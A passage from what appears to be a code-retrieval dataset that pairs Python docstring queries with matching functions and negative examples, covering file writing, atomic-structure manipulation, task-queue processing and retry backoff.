"def writetofile(self, styname=\"pytem.sty\"):\n with open(styname, \"w\") as f:\n f.write(\n HEADER.format(self._name, datetime.datetime.now().strftime(DATEFMT))\n )\n f.write(START)\n for key in self._dict:\n if isinstance(self._dict[key], list):\n f.write(COMMAND.format(key, \", \".join(self._dict[key])))\n else:\n f.write(COMMAND.format(key, self._dict[key]))",
"def convertOutputsToPoscar(self):\n for name in glob('enum/vasp.0*'):\n structNum = str(self.retrieveStructNum(name))\n if structNum>0:\n self.changeToPoscar(name) \n for i in xrange(len(self.s2pStructList)):\n if self.contains(structNum, self.s2pStructList[i]):\n structDir = os.getcwd() + '/' + self.atoms[i] + '/' + structNum\n if os.path.isdir(structDir):\n subprocess.call('rm -r ' + structDir + '/*', shell=True)\n else:\n subprocess.call(['mkdir', structDir]) \n \n subprocess.call(['cp','POSCAR',structDir])\n self.s2pStructList[i].remove(str(structNum))\n \n subprocess.call(['rm',name])\n subprocess.call(['rm','POSCAR'])",
"def write_to_file(self, data):",
"def save_to_file(filename: str, key: bytes, contents: bytes,\n N=1024, r=8, p=1):\n with pyscrypt.ScryptFile(filename, key, N, r, p) as file:\n file.write(contents)",
"def write(self, title, content):\n title = re.sub('[\\.\\\\,\\?/`~!@#$%\\^\\&\\*\\+\\=;:\\'\\\"\\{\\}<>\\|\\s]', '', title, flags=re.IGNORECASE)\n fn = '{title}_{id}.{ext}'.format(title=title, id=self.n, ext=self.file_ext)\n p = os.path.join(self.folder, fn)\n\n with open(p, 'w', encoding=self.encoding) as f:\n f.write(content)\n\n if self.verbose:\n print(self.n, fn)",
"def write(self, filename='subspace.pkl'):\n cPickle.dump(self, open(filename, 'wb'))",
"def write_obj_to_file(strobj):\n tiedosto = 'countryobjs.txt'\n filename = os.path.expanduser('~/') + tiedosto\n try:\n file = open(filename, 'a')\n file.writelines(f\"{strobj}\\n\")\n file.close()\n except Exception as e:\n print(f\"Failed to write to file: {tiedosto}\")",
"def savetxt(self, filename):\n with open(filename, \"w\") as fout:\n for obj in self.atom_to_obj:\n fout.write(\"%s\\n\" % obj)",
"def write(self, filename, type_='obo'): #FIXME this is bugged\n if os.path.exists(filename):\n name, ext = filename.rsplit('.',1)\n try:\n prefix, num = name.rsplit('_',1)\n n = int(num)\n n += 1\n filename = prefix + '_' + str(n) + '.' + ext\n except ValueError:\n filename = name + '_1.' + ext\n print('file exists, renaming to %s' % filename)\n self.write(filename)\n\n else:\n with open(filename, 'wt', encoding='utf-8') as f:\n if type_ == 'obo':\n f.write(str(self)) # FIXME this is incredibly slow for big files :/\n elif type_ == 'ttl':\n f.write(self.__ttl__())\n else:\n raise TypeError('No exporter for file type %s!' % type_)",
"def write_c_file(self, filename):\n with open(filename,'w') as fobj:\n text=self.get_c_text()\n fobj.write(text)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Return a copy of poscar with each atom iat displaced by random \Aring along its icoordth Cartesian coordinate.
|
def move_atoms(poscar):
nruter=copy.deepcopy(poscar)
displist = np.array([0.,0,0])
ntot = nruter["positions"].shape[1]
for iat in range(ntot):
disp = (0.01 * np.random.randn(3) + 0.03) * random_sign()
displist = np.vstack((displist,disp)) # will the vstack here drag the speed?
nruter["positions"][:,iat]+=scipy.linalg.solve(nruter["lattvec"],
disp)
nruter['displist'] = displist[1:]
#nruter['u_0'] = np.max(displist[1:])
return (nruter)
|
[
"def initiate_atoms_randomly(self,quantitiy):\n coords=[]\n for i in range(np.shape(self.grid)[0]):\n for j in range(np.shape(self.grid)[1]):\n coords.append([i,j])\n np.random.shuffle(coords)#shuffles created coords without repetitions\n for i in range(quantitiy-1):\n self.list_of_atoms.append(atom(*(coords[i])))\n self.grid[coords[i][0],coords[i][1]]=1",
"def position_atoms(self):\n atoms = []\n for i in range(self._atoms):\n x = random.randint(1,8)\n y = random.randint(1,8)\n atoms.append([x,y])\n return atoms",
"def random_polar_coordinates_xyz():\r\n r = random()\r\n theta = uniform(0, 2 * math.pi)\r\n x = round(math.sqrt(r) * math.cos(theta) * DISC_RADIUS, 3)\r\n y = round(math.sqrt(r) * math.sin(theta) * DISC_RADIUS, 3)\r\n z = round(uniform(0, DISC_HEIGHT), 3)\r\n return x, y, z",
"def _get_random_displacements(self, ndata, mode=\"gauss\"):\n disp_xyz = np.zeros(3)\n disp_random = np.zeros((ndata, self._supercell.nat, 3))\n\n if mode == \"gauss\":\n for idata in range(ndata):\n for i in range(self._supercell.nat):\n for j in range(3):\n # Generate a random number following the Gaussian distribution\n disp_xyz[j] = random.gauss(0.0, 1.0)\n\n # Normalize the random displacement so that it has the norm\n # of self._displacement_magnitude.\n norm = np.linalg.norm(disp_xyz)\n disp_random[idata, i, :] = disp_xyz[:] / norm * self._displacement_magnitude\n\n # Transform to the fractional coordinate\n disp_random[idata, i] = np.dot(disp_random[idata, i],\n self._supercell.inverse_lattice_vector.transpose())\n\n elif mode == \"uniform\":\n for idata in range(ndata):\n for i in range(self._supercell.nat):\n for j in range(3):\n # Generate a random number following the Gaussian distribution\n disp_xyz[j] = random.uniform(-self._displacement_magnitude,\n self._displacement_magnitude)\n\n # Transform to the fractional coordinate\n disp_random[idata, i] = np.dot(disp_xyz[:],\n self._supercell.inverse_lattice_vector.transpose())\n else:\n raise RuntimeError(\"Invalid option for the random number distribution types.\")\n\n return disp_random",
"def rotaiton_layer(circ):\n random_points0 = np.random.randint(0, len(single_rotatoins), circ.num_qubits)\n random_points1 = np.random.randint(0, len(single_rotatoins), circ.num_qubits)\n for ii in range(circ.num_qubits):\n single_rotatoins[random_points0[ii]](ii)\n single_rotatoins[random_points1[ii]](ii)",
"def __generateCarrots(self):\n\t\tfor i in range(self.carrotNumber):\n\t\t\tc = Carrot(self, 0, 0)\n\t\t\tc.reposition(self, Panda.pandaList, Spike.spikeNormalList)",
"def army_shuffle(self):\n for first in xrange(len(self.tiles)):\n second = random.randint(0, first)\n self.tiles[first], self.tiles[second] = self.tiles[second], self.tiles[first]",
"def __init__(self, paises_por_tarjeta):\n self.pila = []\n self.descarte = []\n for clave in paises_por_tarjeta:\n for elem in paises_por_tarjeta[clave]:\n tarjeta = Tarjeta(elem, clave)\n self.pila.append(tarjeta)\n random.shuffle(self.pila)",
"def random_pos(self):\n temp = 0\n while temp < len(self.objects):\n line = random.randint(0, 14)\n column = random.randint(0, 14)\n if self.object_position(line, column, self.objects[temp].letter):\n temp += 1",
"def random(self):\r\n if self.ate_apple:\r\n self.x = 20 * random.randint(0, 23)\r\n self.y = 20 * random.randint(3, 23)",
"def project_by_random_matrix(photon_zyxs, distort=None, debug=False):\n rand_axis = np.random.normal(size=3)\n if distort is not None:\n if 'quadrupole' in distort:\n rand_axis *= distort['quadrupole']\n if 'dipole' in distort:\n rand_axis += distort['dipole']\n rand_axis /= np.sqrt(np.dot(rand_axis, rand_axis))\n rand_angle = np.random.uniform(0, 2 * np.pi) + 1 # 0 to 2pi can scale by 0\n\n rot_matrix = angle_axis_to_matrix(rand_angle*rand_axis)\n proj_matrix = rot_matrix[:, 1:3].T # first two cols (arbitrary)\n\n if debug:\n return rand_axis, rot_matrix, proj_matrix\n\n projected_yxs = np.dot(proj_matrix, photon_zyxs.T).T\n\n return projected_yxs",
"def sample_orbit_rotation(self):\n return np.random.random(size=self.number_of_stars) * 2 * np.pi",
"def _generate_pores(self):\n Nx = self._Nx\n Ny = self._Ny\n Nz = self._Nz\n Lc = self._Lc\n Np = Nx*Ny*Nz\n ind = sp.arange(0,Np)\n self.set_pore_data(prop='numbering',data=ind)\n self.set_pore_info(label='all',locations=sp.ones_like(ind))\n pore_coords = Lc/2+Lc*sp.array(sp.unravel_index(ind, dims=(Nx, Ny, Nz), order='F'),dtype=sp.float64).T\n self.set_pore_data(prop='coords',data=pore_coords)",
"def point_mutation(self, clone, mutation_rate):\r\n for i in range(0, len(clone.paratopes)):\r\n if random() < mutation_rate:\r\n clone.paratopes[i] = self.rand_paratope()\r\n return clone",
"def __make_position_list(self):\n res = list()\n for i in range(self.board_size):\n for j in range(self.board_size):\n res.append((i, j))\n np.random.shuffle(res)\n return res",
"def randomCircuit(self,):\n circuit = []\n\n # hadamard zone\n for i in range(self.numAncillas):\n circuit.append(self.HAD(i))\n\n # cswap zone\n for i in range(int(self.depth)):\n control = random.randint(0, self.numAncillas - 1)\n targets = [random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)]\n t2 = random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)\n while t2 == targets[0]:\n t2 = random.randint(self.numAncillas, self.numAncillas + self.numInputs - 1)\n targets.append(t2)\n circuit.append(self.CSWAP(control, targets))\n\n return circuit",
"def mutate(self):\n r = randint(1, 2)\n for i in range(0, r):\n p1 = randint(1, len(self.cities()) - 1)\n p2 = randint(1, len(self.cities()) - 1)\n self.cities()[p1:p2] = reversed(self.cities()[p1:p2])\n\n self.calculate_distance()",
"def puntosCirculo( centro, npuntos, r, etiqueta):\r\n\tfor i in range(npuntos):\r\n\t\txnew= np.random.uniform(-r+centro[0], r+centro[0])\r\n\t\tytop=np.sqrt((r**2) - (xnew-centro[0])**2)+centro[1]\r\n\t\tylow=-(np.sqrt((r**2) - (xnew-centro[0])**2))+centro[1]\r\n\t\tynew=np.random.uniform(ylow, ytop)\r\n\t\tif i ==0:\r\n\t\t\tpuntos=np.array([xnew, ynew, etiqueta])\r\n\t\telse:\r\n\t\t\tpuntos= np.vstack( (puntos, np.array([xnew, ynew, etiqueta]) ))\r\n\t\r\n\treturn( puntos )",
"def __init__(self, \n atoms,\n elements = None, \n atom_distortion=0.2, \n lattice_distortion=0.10,\n shrink_bias = 0.25, \n deletion_chance=0.05, \n rcut=6.5, \n volume_change_max = 0.05, \n flip_chance = 0.10,\n swap_chance = 0.05,\n min_cells = 2,\n random_seed = None):\n self.atoms = atoms\n if isinstance(random_seed, int):\n np.random.seed(random_seed)\n self.atoms_out = self.random_super_cell(self.atoms, rcut, min_cells)\n \n self.random_deletion(self.atoms_out, deletion_chance)\n \n self.random_distortion(self.atoms_out, \n atom_distortion, \n lattice_distortion, \n volume_change_max,\n shrink_bias)\n \n if elements == None:\n el = atoms.get_chemical_symbols()\n elements = list(set(el))\n \n self.random_swaps(self.atoms_out, elements, swap_chance)\n \n if flip_chance:\n self.random_magnetic_moment_flips(self.atoms_out, flip_chance)",
"def do_random_object_pose(self, context, passive_box, safty_margin=[0,0,0], xyz_manipulator=[0,0,0]):\n x = passive_box.location[0] + xyz_manipulator[0] + randint(-round(passive_box.dimensions[0]*(0.5-(safty_margin[0]/2))), round(passive_box.dimensions[0]*(0.5-(safty_margin[0]/2))))\n y = passive_box.location[1] + xyz_manipulator[1] + randint(-round(passive_box.dimensions[1]*(0.5-(safty_margin[1]/2))), round(passive_box.dimensions[1]*(0.5-(safty_margin[1]/2))))\n z = passive_box.location[2] + xyz_manipulator[2] + randint(round(passive_box.dimensions[2]*safty_margin[2]), round(passive_box.dimensions[2]*safty_margin[2] + passive_box.dimensions[2]/2)) # randint(-round(passive_box.dimensions[2]*(0.5-(safty_margin[2]/2))), round(passive_box.dimensions[2]*(0.5-(safty_margin[2]/2))))\n alpha = radians(randint(-90, 90))\n beta = radians(randint(-90, 90))\n gamma = radians(randint(-90, 90))\n return [x, y, z], [alpha, beta, gamma]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Process a batch of microversions tasks and commit them.
|
def process_data(max_tasks=DEFAULT_MAX_TASKS, allow_transient_errors=False):
vcs = versions.VersionControlService()
queue = taskqueue.Queue(TASKQUEUE_NAME)
# The size of this list will be O(max changes of the same file path).
# A new changeset is added for each change to the same file, within the set
# of leased tasks.
changesets = [vcs.new_staging_changeset()]
# Grab the oldest tasks and reorder in chronological order.
# TODO(user): do pull queues guarantee native ordering already?
try:
tasks = queue.lease_tasks(
lease_seconds=TASKQUEUE_LEASE_SECONDS, max_tasks=max_tasks)
tasks = sorted(tasks, key=lambda t: pickle.loads(t.payload)['time'])
except taskqueue.TransientError:
if allow_transient_errors:
return False
raise
results = []
successful_tasks = []
for task in tasks:
level = 0
microversion_data = pickle.loads(task.payload)
microversion_data.pop('time')
path = microversion_data['file_kwargs']['path']
while True:
if not path in changesets[level].associated_paths:
break
else:
# We've seen this file change before, ascend one level of changesets.
level += 1
if level == len(changesets):
changesets.append(vcs.new_staging_changeset())
try:
_write_microversion(changeset=changesets[level], **microversion_data)
results.append({'path': path, 'changeset': changesets[level]})
successful_tasks.append(task)
except Exception as e:
logging.exception('Microversion for "%s" failed.', path)
results.append({'path': path, 'error': e})
for changeset in changesets:
if not changeset.associated_paths:
# Every file might have failed, so we would have an empty changeset.
# Allow this changeset to be orphaned.
continue
changeset.finalize_associated_files()
vcs.commit(changeset, save_manifest=False)
if successful_tasks:
queue.delete_tasks(successful_tasks)
# Exponential backoff will be triggered if this returns a null value.
return results
|
[
"def _submit_tasks(\n self,\n taskgroup_uuid: uuid.UUID | None,\n endpoint_uuid: uuid.UUID,\n user_endpoint_config: dict | None,\n futs: list[ComputeFuture],\n tasks: list[_TaskSubmissionInfo],\n ):\n if taskgroup_uuid is None and self.task_group_id:\n taskgroup_uuid = self.task_group_id\n\n batch = self.funcx_client.create_batch(\n taskgroup_uuid, user_endpoint_config, create_websocket_queue=True\n )\n submitted_futs_by_fn: t.DefaultDict[str, list[ComputeFuture]] = defaultdict(\n list\n )\n for fut, task in zip(futs, tasks):\n f_uuid_str = str(task.function_uuid)\n submitted_futs_by_fn[f_uuid_str].append(fut)\n batch.add(f_uuid_str, task.args, task.kwargs)\n log.debug(\"Added task to Globus Compute batch: %s\", task)\n\n try:\n batch_response = self.funcx_client.batch_run(endpoint_uuid, batch)\n except Exception as e:\n log.exception(f\"Error submitting {len(tasks)} tasks to Globus Compute\")\n for fut_list in submitted_futs_by_fn.values():\n for fut in fut_list:\n fut.set_exception(e)\n raise\n\n try:\n received_tasks_by_fn: dict[str, list[str]] = batch_response[\"tasks\"]\n new_tg_id: str = batch_response[\"task_group_id\"]\n except Exception as e:\n log.exception(\n f\"Server response ({batch_response}) missing an expected field\"\n )\n for fut_list in submitted_futs_by_fn.values():\n for fut in fut_list:\n fut.set_exception(e)\n raise\n\n if str(self.task_group_id) != new_tg_id:\n log.info(f\"Updating task_group_id from {self.task_group_id} to {new_tg_id}\")\n self.task_group_id = new_tg_id\n\n batch_count = sum(len(x) for x in received_tasks_by_fn.values())\n self.task_count_submitted += batch_count\n log.debug(\n \"Batch submitted to task_group: %s - %s (total: %s)\",\n self.task_group_id,\n batch_count,\n self.task_count_submitted,\n )\n\n for fn_id, fut_list in submitted_futs_by_fn.items():\n task_uuids = received_tasks_by_fn.get(fn_id)\n\n if task_uuids is None:\n fut_exc = Exception(\n f\"The Globus Compute Service ignored tasks for function {fn_id}!\"\n \" This 'should not happen,' so please reach out to the Globus\"\n \" Compute team if you are able to recreate this behavior.\"\n )\n for fut in fut_list:\n fut.set_exception(fut_exc)\n continue\n\n if len(fut_list) != len(task_uuids):\n fut_exc = Exception(\n \"The Globus Compute Service only partially initiated requested\"\n f\" tasks for function {fn_id}! It is unclear which tasks it\"\n \" honored, so marking all futures as failed. Please reach out\"\n \" to the Globus Compute team if you are able to recreate this\"\n \" behavior.\"\n )\n for fut in fut_list:\n fut.set_exception(fut_exc)\n continue\n\n # Happy -- expected -- path\n for fut, task_id in zip(fut_list, task_uuids):\n fut.task_id = task_id",
"def upload_transformed(self, releases: List[IrusOapenRelease], **kwargs) -> None:\n for release in releases:\n success = gcs_upload_files(\n bucket_name=self.cloud_workspace.transform_bucket,\n file_paths=[release.transform_path],\n )\n set_task_state(success, kwargs[\"ti\"].task_id, release=release)",
"def process(self, files):\n self.track_versions(files)\n astrodriz_params = [\"-n\", \"1\"]\n assoc = self.assoc_files(files)\n if assoc:\n self.run_stage1(*assoc)\n if self.stage2:\n args = astrodriz_params + assoc\n self.run_stage2(*args)\n return\n unassoc = self.unassoc_files(files)\n if unassoc:\n self.run_stage1(*unassoc)\n if self.stage2:\n args = astrodriz_params + unassoc\n self.run_stage2(*args)\n return",
"def _submit_batchtask(self, scriptfile, node):\n raise NotImplementedError",
"def do(task, subtasks):\n raise Exception('TODO IMPLEMENT ME !')",
"def process(self, files):\n raw = [os.path.basename(f) for f in files if f.endswith(\"_raw.fits\")]\n wav = [os.path.basename(f) for f in files if f.endswith(\"_wav.fits\")]\n if raw:\n self.track_versions(files, \"_raw\")\n self.run_stage1(*raw)\n else:\n self.track_versions(files, \"_wav\")\n self.run_stage1(*wav)",
"def reindex_all_files_to_process():\n FileProcessLock.lock()\n print str(datetime.now()), \"purging FilesToProcess:\", FilesToProcess.count()\n FileToProcess.db().drop()\n print str(datetime.now()), \"purging existing ChunksRegistry\", ChunksRegistry.count()\n ChunkRegistry.db().drop()\n\n pool = ThreadPool(CONCURRENT_NETWORK_OPS * 2 )\n\n print str(datetime.now()), \"deleting older chunked data:\",\n CHUNKED_DATA = s3_list_files(CHUNKS_FOLDER)\n print len(CHUNKED_DATA)\n pool.map(s3_delete, CHUNKED_DATA)\n del CHUNKED_DATA\n\n print str(datetime.now()), \"pulling new files to process...\"\n files_lists = pool.map(s3_list_files, [str(s._id) for s in Studies()] )\n print \"putting new files to process...\"\n for i,l in enumerate(files_lists):\n print str(datetime.now()), i+1, \"of\", str(Studies.count()) + \",\", len(l), \"files\"\n for fp in l:\n if fp[-4:] in PROCESSABLE_FILE_EXTENSIONS:\n FileToProcess.append_file_for_processing(fp, ObjectId(fp.split(\"/\", 1)[0]), fp.split(\"/\", 2)[1])\n del files_lists, l\n pool.close()\n pool.terminate()\n print str(datetime.now()), \"processing data.\"\n FileProcessLock.unlock()\n process_file_chunks()",
"async def _post_finished(self):\n for task in self._config.get('post_finished'):\n # Parsing the ansible-y format\n task_name = list(task.keys())[0]\n per_file = False\n # See if we need to run this task per-file\n # TODO: Need better way to do this\n for arg in task[task_name]:\n if ('${one_file}' in arg\n or '$one_file' in arg):\n per_file = True\n break\n\n if per_file:\n for one_file in self._tagged_files:\n task_args = self._arg_expand(\n task[task_name],\n one_file,\n all_files=list(self._tagged_files.keys()))\n # Create actual task after preprocessing args\n proc = await asyncio.create_subprocess_exec(\n task_name,\n *task_args)\n\n if await proc.wait() != 0:\n raise RipError('post_finished task {} failed'.format(\n task_name))\n else:\n task_args = self._arg_expand(\n task[task_name],\n '/dev/null',\n all_files=list(self._tagged_files.keys()))\n # Create actual task after preprocessing args\n proc = await asyncio.create_subprocess_exec(\n task_name,\n *task_args)\n\n if await proc.wait() != 0:\n raise RipError('post_finished task {} failed'.format(\n task_name))",
"def process_commits(repo: Repo, tags: List[Tag], commits: List[CommitInfo]):\n pass",
"def stage(self, files):\n for f in files:\n select_in_tree(self.tree, column=Commits.COLUMN_FILE, key=f)\n GPS.execute_action('vcs stage file')\n yield wait_tasks()",
"def task_execution(databases_connections, task_config):\n for task in task_config:\n print(\"Running task: {0}\".format(task.key))\n if task.e:\n print(\"\\tError occured in the task: {0}\".format(task.e))\n else:\n for con_key in task.parameters:\n if con_key in databases_connections.keys():\n try:\n connection = databases_connections[con_key]\n\n if \"targetConnections\" in task.parameters[con_key]:\n target_keys = task.parameters[con_key][\"targetConnections\"].replace(\" \", \"\").split(\",\")\n targets = []\n for key in target_keys:\n if str(key) in databases_connections:\n target_con = databases_connections[key]\n targets.append(target_con)\n else:\n raise Exception(\"{0} not in the connection list of: {1}\".format(key, databases_connections))\n # end\n task.parameters[con_key][\"targetConnections\"] = targets # convert to list of target arrays\n\n module = importlib.import_module(\"logic.migration\")\n class_ = getattr(module, task.key)\n instance = class_(connection, **task.parameters[con_key])\n\n except Exception as e:\n print(\"Task {0} caused an exception:\\n\\t{1}\".format(task.key, e))\n elif task.key == \"CompareCsv\":\n module = importlib.import_module(\"logic.migration\")\n class_ = getattr(module, task.key)\n instance = class_(**task.parameters[con_key])\n else:\n \n logging.debug(\"Task {0} with {1} not found\".format(task.key, con_key))",
"def submitTasks( self, transIDOPBody, clients ):\n transID = transIDOPBody.keys()[0]\n transBody = transIDOPBody[transID]['Body']\n method = 'submitTasks'\n\n tasksToSubmit = clients['TransformationClient'].getTasksToSubmit( transID, self.tasksPerLoop )\n self._logDebug( \"getTasksToSubmit(%s, %s) return value: %s\" % ( transID, self.tasksPerLoop, tasksToSubmit ),\n method = method, transID = transID )\n if not tasksToSubmit['OK']:\n self._logError( \"Failed to obtain tasks: %s\" % tasksToSubmit['Message'], transID = transID, method = method )\n return tasksToSubmit\n tasks = tasksToSubmit['Value']['JobDictionary']\n if not tasks:\n self._logVerbose( \"No tasks found for submission\", transID = transID, method = method )\n return tasksToSubmit\n self._logInfo( \"Obtained %d tasks for submission\" % len( tasks ), transID = transID, method = method )\n preparedTransformationTasks = clients['TaskManager'].prepareTransformationTasks( transBody, tasks,\n self.owner, self.ownerGroup, self.ownerDN )\n self._logDebug( \"prepareTransformationTasks return value: %s\" % preparedTransformationTasks,\n method = method, transID = transID )\n if not preparedTransformationTasks['OK']:\n self._logError( \"Failed to prepare tasks: %s\" % preparedTransformationTasks['Message'],\n transID = transID, method = method )\n return preparedTransformationTasks\n\n res = self.__actualSubmit( preparedTransformationTasks, clients, transID )\n\n res = clients['TaskManager'].updateDBAfterTaskSubmission( res['Value'] )\n self._logDebug( \"updateDBAfterTaskSubmission return value: %s\" % res, method = method, transID = transID )\n if not res['OK']:\n self._logError( \"Failed to update DB after task submission: %s\" % res['Message'],\n transID = transID, method = method )\n return res\n\n return S_OK()",
"def process_subset_tasks(self, subset_tasks):\n jobs = [\n self.queue.enqueue(\n self.subsetter.process_task,\n job_timeout=DEFAULT_TIMEOUT,\n result_ttl=DEFAULT_TIMEOUT,\n ttl=DEFAULT_TIMEOUT,\n **task\n )\n for task in subset_tasks\n ]\n return self.wait_for(jobs)",
"def submit_batch(self, command):\n pass",
"def submit_all(self: SubmitApp) -> None:\n self.count = submit_from(self.source, template=self.template,\n bundlesize=self.bundlesize, bundlewait=self.bundlewait,\n tags=Tag.parse_cmdline_list(self.taglist))",
"def run(self, local_project):\n # Walks project adding project/folder to small_item_task_builder and adding files to small_files/large_files\n ProjectWalker.walk_project(local_project, self)\n\n self.sort_files_list(self.small_files)\n self.add_small_files_to_task_builder()\n # Run small items in parallel\n self.runner.run()\n\n # Run parts of each large item in parallel\n self.sort_files_list(self.large_files)\n self.upload_large_files()",
"def process_batch(self, urls, extra_headers=None):\n\n # cull out ones we've got\n n_before = len(urls)\n urls = [url for url in urls if not self.store.already_got(url)]\n logging.info(\"processing %d urls (%d are new)\", n_before, len(urls))\n\n err_cnt = 0\n try:\n\n for url in urls:\n try:\n logging.debug(\"fetch %s\",url)\n headers = {}\n headers.update(self.headers)\n if extra_headers:\n headers.update(extra_headers)\n response = requests.get(url, headers=headers)\n\n # TODO: maybe just skip ones which redirect to other domains?\n if response.url != url:\n if self.disallow_redirects == True:\n logging.warning(\"Skipping %s because it redirected to %s\", url, response.url)\n continue\n elif self.require_same_domain == True:\n orig_location = urlparse.urlparse(url)\n new_location = urlparse.urlparse(response.url)\n if orig_location.netloc != new_location.netloc:\n logging.warning(\"Skipping %s because it redirected to another domain: %s\", url, response.url)\n continue\n\n press_release = self.extract(response.text, url)\n\n # encode text fields\n # TODO: use isinstance(...,unicode) instead\n for f in ('url','title','source','text','location','language','topics'):\n if f in press_release:\n press_release[f] = press_release[f].encode('utf-8')\n self.store.add(press_release)\n \n except Exception as e:\n logging.error(\"failed on %s: %s %s\",url,e.__class__,e)\n print traceback.print_exc()\n err_cnt += 1\n finally:\n self.store.save()",
"def task_list(self):\n self.developed_model_version_id = new_models(self.old_developed_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n decomp_step_id=self.decomp_step_id,\n desc=self.description + ' previous version {}'.\n format(self.old_developed_model_version_id))[0]\n self.developed_task = CODEmTask(model_version_id=self.developed_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n parameter_dict=self.codem_params,\n cores=self.num_cores)\n self.global_model_version_id = new_models(self.old_global_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n decomp_step_id=self.decomp_step_id,\n desc=self.description + ' previous version {}'.\n format(self.old_global_model_version_id))[0]\n self.global_task = CODEmTask(model_version_id=self.global_model_version_id,\n db_connection=self.db_connection,\n gbd_round_id=self.gbd_round_id,\n parameter_dict=self.codem_params,\n cores=self.num_cores)\n self.hybrid_task = HybridTask(user=self.user,\n developed_model_version_id=self.developed_model_version_id,\n global_model_version_id=self.global_model_version_id,\n conn_def=self.conn_def,\n upstream_tasks=[self.developed_task,\n self.global_task],\n parameter_dict=self.hybridizer_params)\n return [self.developed_task, self.global_task, self.hybrid_task]",
"def run_tasks(stdout):\n tasks = Task.objects.filter(time__lte=timezone.now() + timedelta(minutes=30), active=True)\n stdout.write(\"Working on {} tasks\".format(len(tasks)))\n for task in tasks.all():\n status = execute_task(task)\n if status == \"OK\":\n task.active = False\n task.save()\n Report.objects.create(task=task, status=0, success=True, text=status)\n else:\n Report.objects.create(task=task, status=-1, success=False, text=status)\n stdout.write(status)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Like process_data, but with exponential backoff.
|
def process_data_with_backoff(
timeout_seconds=DEFAULT_PROCESSING_TIMEOUT_SECONDS,
max_tasks=DEFAULT_MAX_TASKS):
results = utils.run_with_backoff(
func=process_data,
runtime=timeout_seconds,
max_tasks=max_tasks,
allow_transient_errors=True)
for result in results:
if result is not False and 'error' in result:
logging.error('Microversion failed (will retry): %s - %s',
results['path'], results['error'])
return results
|
[
"def _procces_in_batch(self) -> None:\n if not self._handler:\n raise HandlerNotSet()\n\n start_at = time.time()\n buffer = self._wait_buffer_ready()\n elapsed_time = time.time() - start_at\n\n # When _wait_for_ready_buffer is stopped buffer could be empty\n # avoid calling process_batch() with empty list.\n if not buffer:\n return\n\n buffer_size = len(buffer)\n\n try:\n input_data = buffer.get_inputs()\n\n start_at = time.time()\n batch_output = self._handler(input_data)\n elapsed_time = time.time() - start_at\n\n output_size = len(batch_output)\n\n if buffer_size != output_size:\n # This exception is going to be set in every DataRequest\n raise BadBatchOutputSize(buffer_size, output_size)\n\n except Exception as ex:\n logger.warning(\"An exception occurs processing %s inputs\", buffer_size)\n buffer.set_exception(ex)\n else:\n buffer.set_outputs(batch_output)\n\n logger.debug(\"Process %s elements in %s seconds\", buffer_size, elapsed_time)",
"def batch_job(self, function, batch, **kwargs):\n rate_limit = kwargs.get('limit', 100)\n timeout = kwargs.get('timeout', 0)\n count = 0\n response = []\n for item in batch:\n response.append(function(item))\n count += 1\n if count % rate_limit == 0:\n print(f\"{count} calls have been processed. Timing out for {timeout} minute(s) in order to stay under the rate limit\")\n time.sleep(timeout)\n return response",
"def retry_request_historical_data(context, data):\r\n retry = 3 # Retry 3 times and give up\r\n count = 1 # The number of the current try\r\n ans = None # Retrieved hist if the action is successful.\r\n while count <= retry:\r\n count += 1\r\n try:\r\n # Invoke request_historical_data to retrieve historical data from server\r\n ans = request_historical_data(context.sec, '1 Day', '5 D', endTime=pytz.utc.localize(dt.datetime.utcnow()))\r\n break\r\n except RuntimeError:\r\n # Sleep 3 seconds and try it again\r\n time.sleep(3)\r\n return ans",
"def process_data(self, data):\n for line in self.buffer.process_data(data):\n try:\n self.process_line(line)\n except Exception as e:\n on_exception.send(self, e=e)",
"def test_backoff(self):\n r = retrying.retry(wait_exponential_multiplier=1000)(fail_n(9))\n\n fake_time = FakeTime()\n with fake_time:\n r()\n self.assertGreaterEqual(fake_time.mock_sleep.total, 2**9 - 1)",
"def _process_data_events(self):\n self.channel.basic_consume(self._on_response, no_ack=True,\n queue=self.callback_queue)\n while True:\n with self.internal_lock:\n self.connection.process_data_events()\n time.sleep(0.1)",
"def _backoff(self, ngram):\n return self.model[ngram][0][1]",
"def process(self, data, **kwargs):\n # sequentially process the data\n for processor in self.processors:\n data = _process((processor, data, kwargs))\n return data",
"def retry(func, max_time, *args, **kwargs):\n\n jitter = Jitter()\n time_passed = 0\n while True:\n try:\n return func(*args, **kwargs)\n except AmpliumException:\n if time_passed < max_time:\n time_passed = jitter.backoff()\n else:\n raise",
"def process_data(self, iterator, start_val=0, max_vals=None, **kwargs):\n raise Exception(\"Unimplemented Function\")",
"def wrap(self, awsfunc, *args, **nargs):\n attempts = 0\n\n while True:\n attempts = attempts + 1\n try:\n if self.rate_limit_delay > 0:\n time.sleep(self.rate_limit_delay)\n\n retval = awsfunc(*args, **nargs)\n\n if self.rate_limit_delay > 0:\n self.rate_limit_delay = self.rate_limit_delay / 2\n\n return retval\n\n except BotoServerError as e:\n if e.error_code == 'Throttling':\n if self.rate_limit_delay == 0:\n self.rate_limit_delay = 1\n sys.stderr.write('rate-limited: attempt %d\\n' %\n attempts)\n elif self.rate_limit_delay < self.rate_limit_maxdelay:\n self.rate_limit_delay = self.rate_limit_delay * 2\n sys.stderr.write('rate-limited: attempt %d\\n' %\n attempts)\n else:\n raise e\n\n elif e.error_code == 'ServiceUnavailable':\n if self.rate_limit_delay == 0:\n self.rate_limit_delay = 1\n sys.stderr.write('api-unavailable: attempt %d\\n' %\n attempts)\n elif self.rate_limit_delay < self.rate_limit_maxdelay:\n self.rate_limit_delay = self.rate_limit_delay * 2\n sys.stderr.write('api-unavailable: attempt %d\\n' %\n attempts)\n else:\n raise e\n else:\n raise e",
"def _wait_for_data(self):\r\n raise NotImplementedError",
